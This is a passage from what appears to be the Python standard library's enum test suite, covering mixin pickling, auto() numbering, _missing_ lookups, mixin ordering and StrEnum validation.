            if isinstance(self, NamedInt) and isinstance(other, NamedInt):
                return NamedInt(
                    '({0} + {1})'.format(self.__name__, other.__name__),
                    temp,
                    )
            else:
                return temp

        class NEI(NamedInt, Enum):
            __qualname__ = 'NEI'      # needed for pickle protocol 4
            x = ('the-x', 1)
            y = ('the-y', 2)

        self.assertIs(NEI.__new__, Enum.__new__)
        self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
        # register the classes in globals() so pickle can find them by name
        globals()['NamedInt'] = NamedInt
        globals()['NEI'] = NEI
        NI5 = NamedInt('test', 5)
        self.assertEqual(NI5, 5)
        test_pickle_dump_load(self.assertEqual, NI5, 5)
        self.assertEqual(NEI.y.value, 2)
        test_pickle_dump_load(self.assertIs, NEI.y)
        test_pickle_dump_load(self.assertIs, NEI)

    def test_subclasses_without_direct_pickle_support(self):
        # Same NamedInt mix-in as above, but the NEI class defines no
        # pickle hooks of its own; Enum's default pickling is exercised.
        class NamedInt(int):
            __qualname__ = 'NamedInt'
            def __new__(cls, *args):
                _args = args
                name, *args = args
                if len(args) == 0:
                    raise TypeError("name and value must be specified")
                self = int.__new__(cls, *args)
                self._intname = name
                self._args = _args
                return self
            @property
            def __name__(self):
                return self._intname
            def __repr__(self):
                # repr() is updated to include the name and type info
                return "{}({!r}, {})".format(
                        type(self).__name__,
                        self.__name__,
                        int.__repr__(self),
                        )
            def __str__(self):
                # str() is unchanged, even if it relies on the repr() fallback
                base = int
                base_str = base.__str__
                if base_str.__objclass__ is object:
                    return base.__repr__(self)
                return base_str(self)
            # for simplicity, we only define one operator that
            # propagates expressions
            def __add__(self, other):
                temp = int(self) + int( other)
                if isinstance(self, NamedInt) and isinstance(other, NamedInt):
                    return NamedInt(
                        '({0} + {1})'.format(self.__name__, other.__name__),
                        temp )
                else:
                    return temp

        class NEI(NamedInt, Enum):
            __qualname__ = 'NEI'
            x = ('the-x', 1)
            y = ('the-y', 2)

        self.assertIs(NEI.__new__, Enum.__new__)
        self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
        # register the classes in globals() so pickle can find them by name
        globals()['NamedInt'] = NamedInt
        globals()['NEI'] = NEI
        NI5 = NamedInt('test', 5)
        self.assertEqual(NI5, 5)
        self.assertEqual(NEI.y.value, 2)
        test_pickle_dump_load(self.assertIs, NEI.y)
        test_pickle_dump_load(self.assertIs, NEI)

    def test_subclasses_with_direct_pickle_support(self):
        # As above, but NEI supplies its own __reduce_ex__ that pickles
        # members by name via getattr(cls, name).
        class NamedInt(int):
            __qualname__ = 'NamedInt'
            def __new__(cls, *args):
                _args = args
                name, *args = args
                if len(args) == 0:
                    raise TypeError("name and value must be specified")
                self = int.__new__(cls, *args)
                self._intname = name
                self._args = _args
                return self
            @property
            def __name__(self):
                return self._intname
            def __repr__(self):
                # repr() is updated to include the name and type info
                return "{}({!r}, {})".format(
                        type(self).__name__,
                        self.__name__,
                        int.__repr__(self),
                        )
            def __str__(self):
                # str() is unchanged, even if it relies on the repr() fallback
                base = int
                base_str = base.__str__
                if base_str.__objclass__ is object:
                    return base.__repr__(self)
                return base_str(self)
            # for simplicity, we only define one operator that
            # propagates expressions
            def __add__(self, other):
                temp = int(self) + int( other)
                if isinstance(self, NamedInt) and isinstance(other, NamedInt):
                    return NamedInt(
                        '({0} + {1})'.format(self.__name__, other.__name__),
                        temp,
                        )
                else:
                    return temp

        class NEI(NamedInt, Enum):
            __qualname__ = 'NEI'
            x = ('the-x', 1)
            y = ('the-y', 2)
            def __reduce_ex__(self, proto):
                # pickle members by (class, member-name) lookup
                return getattr, (self.__class__, self._name_)

        self.assertIs(NEI.__new__, Enum.__new__)
        self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
        # register the classes in globals() so pickle can find them by name
        globals()['NamedInt'] = NamedInt
        globals()['NEI'] = NEI
        NI5 = NamedInt('test', 5)
        self.assertEqual(NI5, 5)
        self.assertEqual(NEI.y.value, 2)
        test_pickle_dump_load(self.assertIs, NEI.y)
        test_pickle_dump_load(self.assertIs, NEI)

    def test_tuple_subclass(self):
        # Enum members mixed with tuple are tuples and pickle round-trip.
        class SomeTuple(tuple, Enum):
            __qualname__ = 'SomeTuple'      # needed for pickle protocol 4
            first = (1, 'for the money')
            second = (2, 'for the show')
            third = (3, 'for the music')
        self.assertIs(type(SomeTuple.first), SomeTuple)
        self.assertIsInstance(SomeTuple.second, tuple)
        self.assertEqual(SomeTuple.third, (3, 'for the music'))
        globals()['SomeTuple'] = SomeTuple
        test_pickle_dump_load(self.assertIs, SomeTuple.first)

    def test_duplicate_values_give_unique_enum_items(self):
        # A custom __new__ assigning sequential values keeps members distinct
        # even though every definition uses the same (empty) tuple.
        class AutoNumber(Enum):
            first = ()
            second = ()
            third = ()
            def __new__(cls):
                value = len(cls.__members__) + 1
                obj = object.__new__(cls)
                obj._value_ = value
                return obj
            def __int__(self):
                return int(self._value_)
        self.assertEqual(
                list(AutoNumber),
                [AutoNumber.first, AutoNumber.second, AutoNumber.third],
                )
        self.assertEqual(int(AutoNumber.second), 2)
        self.assertEqual(AutoNumber.third.value, 3)
        self.assertIs(AutoNumber(1), AutoNumber.first)

    def test_inherited_new_from_enhanced_enum(self):
        # Subclasses inherit a custom __new__ defined on an Enum base.
        class AutoNumber(Enum):
            def __new__(cls):
                value = len(cls.__members__) + 1
                obj = object.__new__(cls)
                obj._value_ = value
                return obj
            def __int__(self):
                return int(self._value_)
        class Color(AutoNumber):
            red = ()
            green = ()
            blue = ()
        self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
        self.assertEqual(list(map(int, Color)), [1, 2, 3])

    def test_inherited_new_from_mixed_enum(self):
        # Same, but the base is an IntEnum so members are real ints.
        class AutoNumber(IntEnum):
            def __new__(cls):
                value = len(cls.__members__) + 1
                obj = int.__new__(cls, value)
                obj._value_ = value
                return obj
        class Color(AutoNumber):
            red = ()
            green = ()
            blue = ()
        self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
        self.assertEqual(list(map(int, Color)), [1, 2, 3])

    def test_equality(self):
        # ALWAYS_EQ (helper object equal to everything) compares equal to
        # members in both operand orders.
        class OrdinaryEnum(Enum):
            a = 1
        self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
        self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)

    def test_ordered_mixin(self):
        # A mixin supplying rich comparisons makes members orderable.
        class OrderedEnum(Enum):
            def __ge__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ >= other._value_
                return NotImplemented
            def __gt__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ > other._value_
                return NotImplemented
            def __le__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ <= other._value_
                return NotImplemented
            def __lt__(self, other):
                if self.__class__ is other.__class__:
                    return self._value_ < other._value_
                return NotImplemented
        class Grade(OrderedEnum):
            A = 5
            B = 4
            C = 3
            D = 2
            F = 1
        self.assertGreater(Grade.A, Grade.B)
        self.assertLessEqual(Grade.F, Grade.C)
        self.assertLess(Grade.D, Grade.A)
        self.assertGreaterEqual(Grade.B, Grade.B)
        self.assertEqual(Grade.B, Grade.B)
        self.assertNotEqual(Grade.C, Grade.D)

    def test_extending2(self):
        # Subclassing an Enum that already has members is a TypeError.
        class Shade(Enum):
            def shade(self):
                print(self.name)
        class Color(Shade):
            red = 1
            green = 2
            blue = 3
        with self.assertRaises(TypeError):
            class MoreColor(Color):
                cyan = 4
                magenta = 5
                yellow = 6

    def test_extending3(self):
        # Subclassing member-less Enum bases (methods only) is allowed.
        class Shade(Enum):
            def shade(self):
                return self.name
        class Color(Shade):
            def hex(self):
                return '%s hexlified!' % self.value
        class MoreColor(Color):
            cyan = 4
            magenta = 5
            yellow = 6
        self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')

    def test_subclass_duplicate_name(self):
        # A member may shadow a plain method of the base Enum.
        class Base(Enum):
            def test(self):
                pass
        class Test(Base):
            test = 1
        self.assertIs(type(Test.test), Test)

    def test_subclass_duplicate_name_dynamic(self):
        # DynamicClassAttribute / enum.property let a member and an
        # instance attribute share the same name.
        from types import DynamicClassAttribute
        class Base(Enum):
            @DynamicClassAttribute
            def test(self):
                return 'dynamic'
        class Test(Base):
            test = 1
        self.assertEqual(Test.test.test, 'dynamic')
        class Base2(Enum):
            @enum.property
            def flash(self):
                return 'flashy dynamic'
        class Test(Base2):
            flash = 1
        self.assertEqual(Test.flash.flash, 'flashy dynamic')

    def test_no_duplicates(self):
        # A base whose __init__ rejects duplicate values forbids aliases.
        class UniqueEnum(Enum):
            def __init__(self, *args):
                cls = self.__class__
                if any(self.value == e.value for e in cls):
                    a = self.name
                    e = cls(self.value).name
                    raise ValueError(
                            "aliases not allowed in UniqueEnum:  %r --> %r"
                            % (a, e)
                            )
        class Color(UniqueEnum):
            red = 1
            green = 2
            blue = 3
        with self.assertRaises(ValueError):
            class Color(UniqueEnum):
                red = 1
                green = 2
                blue = 3
                grene = 2
        # NOTE(review): the alias-error message spacing above is reproduced
        # from the source as-is; confirm against upstream before relying on it.

    def test_init(self):
        # Tuple values are unpacked into __init__ arguments.
        class Planet(Enum):
            MERCURY = (3.303e+23, 2.4397e6)
            VENUS   = (4.869e+24, 6.0518e6)
            EARTH   = (5.976e+24, 6.37814e6)
            MARS    = (6.421e+23, 3.3972e6)
            JUPITER = (1.9e+27,   7.1492e7)
            SATURN  = (5.688e+26, 6.0268e7)
            URANUS  = (8.686e+25, 2.5559e7)
            NEPTUNE = (1.024e+26, 2.4746e7)
            def __init__(self, mass, radius):
                self.mass = mass       # in kilograms
                self.radius = radius   # in meters
            @property
            def surface_gravity(self):
                # universal gravitational constant  (m3 kg-1 s-2)
                G = 6.67300E-11
                return G * self.mass / (self.radius * self.radius)
        self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
        self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))

    def test_ignore(self):
        # _ignore_ removes scaffolding names (here the loop variable and the
        # vars() alias) from the finished enumeration.
        class Period(timedelta, Enum):
            '''
            different lengths of time
            '''
            def __new__(cls, value, period):
                obj = timedelta.__new__(cls, value)
                obj._value_ = value
                obj.period = period
                return obj
            _ignore_ = 'Period i'
            Period = vars()
            for i in range(13):
                Period['month_%d' % i] = i*30, 'month'
            for i in range(53):
                Period['week_%d' % i] = i*7, 'week'
            for i in range(32):
                Period['day_%d' % i] = i, 'day'
            OneDay = day_1
            OneWeek = week_1
            OneMonth = month_1
        self.assertFalse(hasattr(Period, '_ignore_'))
        self.assertFalse(hasattr(Period, 'Period'))
        self.assertFalse(hasattr(Period, 'i'))
        self.assertTrue(isinstance(Period.day_1, timedelta))
        self.assertTrue(Period.month_1 is Period.day_30)
        self.assertTrue(Period.week_4 is Period.day_28)

    def test_nonhash_value(self):
        # Member values need not be hashable (lists here); lookup by value
        # still works.
        class AutoNumberInAList(Enum):
            def __new__(cls):
                value = [len(cls.__members__) + 1]
                obj = object.__new__(cls)
                obj._value_ = value
                return obj
        class ColorInAList(AutoNumberInAList):
            red = ()
            green = ()
            blue = ()
        self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
        for enum, value in zip(ColorInAList, range(3)):
            value += 1
            self.assertEqual(enum.value, [value])
            self.assertIs(ColorInAList([value]), enum)

    def test_conflicting_types_resolved_in_new(self):
        # __new__ decides which part of the tuple value is the int payload
        # and which is the extra attribute.
        class LabelledIntEnum(int, Enum):
            def __new__(cls, *args):
                value, label = args
                obj = int.__new__(cls, value)
                obj.label = label
                obj._value_ = value
                return obj
        class LabelledList(LabelledIntEnum):
            unprocessed = (1, "Unprocessed")
            payment_complete = (2, "Payment Complete")
        self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
        self.assertEqual(LabelledList.unprocessed, 1)
        self.assertEqual(LabelledList(1), LabelledList.unprocessed)

    def test_auto_number(self):
        # auto() assigns 1, 2, 3, ... by default.
        class Color(Enum):
            red = auto()
            blue = auto()
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 1)
        self.assertEqual(Color.blue.value, 2)
        self.assertEqual(Color.green.value, 3)

    def test_auto_name(self):
        # _generate_next_value_ can make auto() use the member name.
        class Color(Enum):
            def _generate_next_value_(name, start, count, last):
                return name
            red = auto()
            blue = auto()
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 'red')
        self.assertEqual(Color.blue.value, 'blue')
        self.assertEqual(Color.green.value, 'green')

    def test_auto_name_inherit(self):
        # _generate_next_value_ is inherited by subclasses.
        class AutoNameEnum(Enum):
            def _generate_next_value_(name, start, count, last):
                return name
        class Color(AutoNameEnum):
            red = auto()
            blue = auto()
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 'red')
        self.assertEqual(Color.blue.value, 'blue')
        self.assertEqual(Color.green.value, 'green')

    def test_auto_garbage(self):
        # auto() after a non-int value falls back to 1.
        class Color(Enum):
            red = 'red'
            blue = auto()
        self.assertEqual(Color.blue.value, 1)

    def test_auto_garbage_corrected(self):
        # auto() continues from the last int value seen.
        class Color(Enum):
            red = 'red'
            blue = 2
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 'red')
        self.assertEqual(Color.blue.value, 2)
        self.assertEqual(Color.green.value, 3)

    def test_auto_order(self):
        # Defining _generate_next_value_ after auto() has been used fails.
        with self.assertRaises(TypeError):
            class Color(Enum):
                red = auto()
                green = auto()
                blue = auto()
                def _generate_next_value_(name, start, count, last):
                    return name

    def test_auto_order_wierd(self):
        # An auto() instance whose value was pre-set is used verbatim, and
        # a later _generate_next_value_ still applies to subsequent auto()s.
        weird_auto = auto()
        weird_auto.value = 'pathological case'
        class Color(Enum):
            red = weird_auto
            def _generate_next_value_(name, start, count, last):
                return name
            blue = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue])
        self.assertEqual(Color.red.value, 'pathological case')
        self.assertEqual(Color.blue.value, 'blue')

    def test_duplicate_auto(self):
        # An aliased auto() member counts once; numbering continues normally.
        class Dupes(Enum):
            first = primero = auto()
            second = auto()
            third = auto()
        self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))

    def test_default_missing(self):
        # A failed by-value lookup raises ValueError with no chained context.
        class Color(Enum):
            RED = 1
            GREEN = 2
            BLUE = 3
        try:
            Color(7)
        except ValueError as exc:
            self.assertTrue(exc.__context__ is None)
        else:
            raise Exception('Exception not raised.')

    def test_missing(self):
        # _missing_ may return a member, return garbage (internal TypeError),
        # raise, or return None (plain ValueError).
        class Color(Enum):
            red = 1
            green = 2
            blue = 3
            @classmethod
            def _missing_(cls, item):
                if item == 'three':
                    return cls.blue
                elif item == 'bad return':
                    # trigger internal error
                    return 5
                elif item == 'error out':
                    raise ZeroDivisionError
                else:
                    # trigger not found
                    return None
        self.assertIs(Color('three'), Color.blue)
        try:
            Color(7)
        except ValueError as exc:
            self.assertTrue(exc.__context__ is None)
        else:
            raise Exception('Exception not raised.')
        try:
            Color('bad return')
        except TypeError as exc:
            self.assertTrue(isinstance(exc.__context__, ValueError))
        else:
            raise Exception('Exception not raised.')
        try:
            Color('error out')
        except ZeroDivisionError as exc:
            self.assertTrue(isinstance(exc.__context__, ValueError))
        else:
            raise Exception('Exception not raised.')

    def test_missing_exceptions_reset(self):
        # The ValueError raised by a failed lookup must not keep objects
        # alive via a reference loop in the exception context.
        import gc
        import weakref
        #
        class TestEnum(enum.Enum):
            VAL1 = 'val1'
            VAL2 = 'val2'
        #
        class Class1:
            def __init__(self):
                # Gracefully handle an exception of our own making
                try:
                    raise ValueError()
                except ValueError:
                    pass
        #
        class Class2:
            def __init__(self):
                # Gracefully handle an exception of Enum's making
                try:
                    TestEnum('invalid_value')
                except ValueError:
                    pass
        # No strong refs here so these are free to die.
        class_1_ref = weakref.ref(Class1())
        class_2_ref = weakref.ref(Class2())
        #
        # The exception raised by Enum creates a reference loop and thus
        # Class2 instances will stick around until the next garbage collection
        # cycle, unlike Class1.
        gc.collect()  # For PyPy or other GCs.
        self.assertIs(class_1_ref(), None)
        self.assertIs(class_2_ref(), None)

    def test_multiple_mixin(self):
        # Mixin resolution order (MRO) determines which __str__ and which
        # behavior() an enum picks up.
        class MaxMixin:
            @classproperty
            def MAX(cls):
                max = len(cls)
                cls.MAX = max
                return max
        class StrMixin:
            def __str__(self):
                return self._name_.lower()
        class SomeEnum(Enum):
            def behavior(self):
                return 'booyah'
        class AnotherEnum(Enum):
            def behavior(self):
                return 'nuhuh!'
            def social(self):
                return "what's up?"
        class Color(MaxMixin, Enum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 3)
        self.assertEqual(Color.MAX, 3)
        self.assertEqual(str(Color.BLUE), 'BLUE')
        class Color(MaxMixin, StrMixin, Enum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 3)
        self.assertEqual(Color.MAX, 3)
        self.assertEqual(str(Color.BLUE), 'blue')
        class Color(StrMixin, MaxMixin, Enum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 3)
        self.assertEqual(Color.MAX, 3)
        self.assertEqual(str(Color.BLUE), 'blue')
        class CoolColor(StrMixin, SomeEnum, Enum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(CoolColor.RED.value, 1)
        self.assertEqual(CoolColor.GREEN.value, 2)
        self.assertEqual(CoolColor.BLUE.value, 3)
        self.assertEqual(str(CoolColor.BLUE), 'blue')
        self.assertEqual(CoolColor.RED.behavior(), 'booyah')
        class CoolerColor(StrMixin, AnotherEnum, Enum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(CoolerColor.RED.value, 1)
        self.assertEqual(CoolerColor.GREEN.value, 2)
        self.assertEqual(CoolerColor.BLUE.value, 3)
        self.assertEqual(str(CoolerColor.BLUE), 'blue')
        self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
        self.assertEqual(CoolerColor.RED.social(), "what's up?")
        class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(CoolestColor.RED.value, 1)
        self.assertEqual(CoolestColor.GREEN.value, 2)
        self.assertEqual(CoolestColor.BLUE.value, 3)
        self.assertEqual(str(CoolestColor.BLUE), 'blue')
        self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
        self.assertEqual(CoolestColor.RED.social(), "what's up?")
        class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(ConfusedColor.RED.value, 1)
        self.assertEqual(ConfusedColor.GREEN.value, 2)
        self.assertEqual(ConfusedColor.BLUE.value, 3)
        self.assertEqual(str(ConfusedColor.BLUE), 'blue')
        self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
        self.assertEqual(ConfusedColor.RED.social(), "what's up?")
        class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(ReformedColor.RED.value, 1)
        self.assertEqual(ReformedColor.GREEN.value, 2)
        self.assertEqual(ReformedColor.BLUE.value, 3)
        self.assertEqual(str(ReformedColor.BLUE), 'blue')
        self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
        self.assertEqual(ConfusedColor.RED.social(), "what's up?")
        self.assertTrue(issubclass(ReformedColor, int))

    def test_multiple_inherited_mixin(self):
        # @unique works on StrEnum and on subclasses of a StrEnum-derived base.
        @unique
        class Decision1(StrEnum):
            REVERT = "REVERT"
            REVERT_ALL = "REVERT_ALL"
            RETRY = "RETRY"
        class MyEnum(StrEnum):
            pass
        @unique
        class Decision2(MyEnum):
            REVERT = "REVERT"
            REVERT_ALL = "REVERT_ALL"
            RETRY = "RETRY"

    def test_multiple_mixin_inherited(self):
        # A mixin inherited through an intermediate enum class still applies,
        # and a member-defined __new__ can transform the stored value.
        class MyInt(int):
            def __new__(cls, value):
                return super().__new__(cls, value)
        class HexMixin:
            def __repr__(self):
                return hex(self)
        class MyIntEnum(HexMixin, MyInt, enum.Enum):
            pass
        class Foo(MyIntEnum):
            TEST = 1
        self.assertTrue(isinstance(Foo.TEST, MyInt))
        self.assertEqual(repr(Foo.TEST), "0x1")
        class Fee(MyIntEnum):
            TEST = 1
            def __new__(cls, value):
                value += 1
                member = int.__new__(cls, value)
                member._value_ = value
                return member
        self.assertEqual(Fee.TEST, 2)

    def test_miltuple_mixin_with_common_data_type(self):
        # Two str-based mixin enums cooperating: case-insensitive lookup plus
        # lenient _missing_ that manufactures and caches unknown members.
        class CaseInsensitiveStrEnum(str, Enum):
            @classmethod
            def _missing_(cls, value):
                for member in cls._member_map_.values():
                    if member._value_.lower() == value.lower():
                        return member
                return super()._missing_(value)
        #
        class LenientStrEnum(str, Enum):
            def __init__(self, *args):
                self._valid = True
            @classmethod
            def _missing_(cls, value):
                unknown = cls._member_type_.__new__(cls, value)
                unknown._valid = False
                unknown._name_ = value.upper()
                unknown._value_ = value
                cls._member_map_[value] = unknown
                return unknown
            @property
            def valid(self):
                return self._valid
        #
        class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
            ACTIVE = "active"
            PENDING = "pending"
            TERMINATED = "terminated"
        #
        JS = JobStatus
        self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
        self.assertEqual(JS.ACTIVE, 'active')
        self.assertEqual(JS.ACTIVE.value, 'active')
        self.assertIs(JS('Active'), JS.ACTIVE)
        self.assertTrue(JS.ACTIVE.valid)
        missing = JS('missing')
        self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
        self.assertEqual(JS.ACTIVE, 'active')
        self.assertEqual(JS.ACTIVE.value, 'active')
        self.assertIs(JS('Active'), JS.ACTIVE)
        self.assertTrue(JS.ACTIVE.valid)
        self.assertTrue(isinstance(missing, JS))
        self.assertFalse(missing.valid)

    def test_empty_globals(self):
        # bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
        # when using compile and exec because f_globals is empty
        code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
        code = compile(code, "<string>", "exec")
        global_ns = {}
        local_ls = {}
        exec(code, global_ns, local_ls)

    def test_strenum(self):
        # StrEnum: members are their string values; non-str values are
        # rejected with TypeError at class-creation time.
        class GoodStrEnum(StrEnum):
            one = '1'
            two = '2'
            three = b'3', 'ascii'
            four = b'4', 'latin1', 'strict'
        self.assertEqual(GoodStrEnum.one, '1')
        self.assertEqual(str(GoodStrEnum.one), '1')
        self.assertEqual('{}'.format(GoodStrEnum.one), '1')
        self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
        self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
        self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one')
        #
        class DumbMixin:
            def __str__(self):
                return "don't do this"
        class DumbStrEnum(DumbMixin, StrEnum):
            five = '5'
            six = '6'
            seven = '7'
        self.assertEqual(DumbStrEnum.seven, '7')
        self.assertEqual(str(DumbStrEnum.seven), "don't do this")
        #
        class EnumMixin(Enum):
            def hello(self):
                print('hello from %s' % (self, ))
        class HelloEnum(EnumMixin, StrEnum):
            eight = '8'
        self.assertEqual(HelloEnum.eight, '8')
        self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
        #
        class GoodbyeMixin:
            def goodbye(self):
                print('%s wishes you a fond farewell')
        class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
            nine = '9'
        self.assertEqual(GoodbyeEnum.nine, '9')
        self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
        #
        with self.assertRaisesRegex(TypeError, '1 is not a string'):
            class FirstFailedStrEnum(StrEnum):
                one = 1
                two = '2'
        with self.assertRaisesRegex(TypeError, "2 is not a string"):
            class SecondFailedStrEnum(StrEnum):
                one = '1'
                two = 2,
                three = '3'
        with self.assertRaisesRegex(TypeError, '2 is not a string'):
            class ThirdFailedStrEnum(StrEnum):
                one = '1'
                two = 2
        with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
            class ThirdFailedStrEnum(StrEnum):
                one = '1'
                two = b'2', sys.getdefaultencoding
        with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
            class ThirdFailedStrEnum(StrEnum):
                one = '1'
                two = b'2', 'ascii', 9

    @unittest.skipIf(
            python_version >= (3, 12),
            'mixin-format now uses member instead of member.value',
            )
    def test_custom_strenum_with_warning(self):
        # Home-grown str+Enum (pre-3.12): format() uses the value but warns.
        class CustomStrEnum(str, Enum):
            pass
        class OkayEnum(CustomStrEnum):
            one = '1'
            two = '2'
            three = b'3', 'ascii'
            four = b'4', 'latin1', 'strict'
        self.assertEqual(OkayEnum.one, '1')
        self.assertEqual(str(OkayEnum.one), 'one')
        with self.assertWarns(DeprecationWarning):
            self.assertEqual('{}'.format(OkayEnum.one), '1')
            self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one))
        self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
        #
        class DumbMixin:
            def __str__(self):
                return "don't do this"
        class DumbStrEnum(DumbMixin, CustomStrEnum):
            five = '5'
            six = '6'
            seven = '7'
        self.assertEqual(DumbStrEnum.seven, '7')
        self.assertEqual(str(DumbStrEnum.seven), "don't do this")
        #
        class EnumMixin(Enum):
            def hello(self):
                print('hello from %s' % (self, ))
        class HelloEnum(EnumMixin, CustomStrEnum):
            eight = '8'
        self.assertEqual(HelloEnum.eight, '8')
        self.assertEqual(str(HelloEnum.eight), 'eight')
        #
        class GoodbyeMixin:
            def goodbye(self):
                print('%s wishes you a fond farewell')
        class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
            nine = '9'
        self.assertEqual(GoodbyeEnum.nine, '9')
        self.assertEqual(str(GoodbyeEnum.nine), 'nine')
        #
        class FirstFailedStrEnum(CustomStrEnum):
            one = 1   # this will become '1'
            two = '2'
        class SecondFailedStrEnum(CustomStrEnum):
            one = '1'
            two = 2,  # this will become '2'
            three = '3'
        class ThirdFailedStrEnum(CustomStrEnum):
            one = '1'
            two = 2  # this will become '2'
        with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
            class ThirdFailedStrEnum(CustomStrEnum):
                one = '1'
                two = b'2', sys.getdefaultencoding
        with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
            class ThirdFailedStrEnum(CustomStrEnum):
                one = '1'
                two = b'2', 'ascii', 9

    @unittest.skipIf(
            python_version < (3, 12),
            'mixin-format currently uses member.value',
            )
    def test_custom_strenum(self):
        # Home-grown str+Enum (3.12+): format() uses the member, no warning.
        class CustomStrEnum(str, Enum):
            pass
        class OkayEnum(CustomStrEnum):
            one = '1'
            two = '2'
            three = b'3', 'ascii'
            four = b'4', 'latin1', 'strict'
        self.assertEqual(OkayEnum.one, '1')
        self.assertEqual(str(OkayEnum.one), 'one')
        self.assertEqual('{}'.format(OkayEnum.one), 'one')
        self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one')
        #
        class DumbMixin:
            def __str__(self):
                return "don't do this"
        class DumbStrEnum(DumbMixin, CustomStrEnum):
            five = '5'
            six = '6'
            seven = '7'
        self.assertEqual(DumbStrEnum.seven, '7')
        self.assertEqual(str(DumbStrEnum.seven), "don't do this")
        #
        class EnumMixin(Enum):
            def hello(self):
                print('hello from %s' % (self, ))
        class HelloEnum(EnumMixin, CustomStrEnum):
            eight = '8'
        self.assertEqual(HelloEnum.eight, '8')
        self.assertEqual(str(HelloEnum.eight), 'eight')
        #
        class GoodbyeMixin:
            def goodbye(self):
                print('%s wishes you a fond farewell')
        class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum):
            nine = '9'
        self.assertEqual(GoodbyeEnum.nine, '9')
        self.assertEqual(str(GoodbyeEnum.nine), 'nine')
        #
        class FirstFailedStrEnum(CustomStrEnum):
            one = 1   # this will become '1'
            two = '2'
        class SecondFailedStrEnum(CustomStrEnum):
            one = '1'
            two = 2,  # this will become '2'
            three = '3'
        class ThirdFailedStrEnum(CustomStrEnum):
            one = '1'
            two = 2  # this will become '2'
        with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '):
            class ThirdFailedStrEnum(CustomStrEnum):
                one = '1'
                two = b'2', sys.getdefaultencoding
        with self.assertRaisesRegex(TypeError, '.errors. must be str, not '):
            class ThirdFailedStrEnum(CustomStrEnum):
                one = '1'
                two = b'2', 'ascii', 9

    def test_missing_value_error(self):
        # A __new__ that forgets to set _value_ produces a TypeError.
        with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"):
            class Combined(str, Enum):
                #
                def __new__(cls, value, sequence):
                    enum = str.__new__(cls, value)
                    if '(' in value:
                        fis_name, segment = value.split('(', 1)
                        segment = segment.strip(' )')
                    else:
                        fis_name = value
                        segment = None
                    enum.fis_name = fis_name
                    enum.segment = segment
                    enum.sequence = sequence
                    return enum
                #
                def __repr__(self):
                    return "<%s.%s>" % (self.__class__.__name__, self._name_)
                #
                key_type      = 'An$(1,2)', 0
                company_id    = 'An$(3,2)', 1
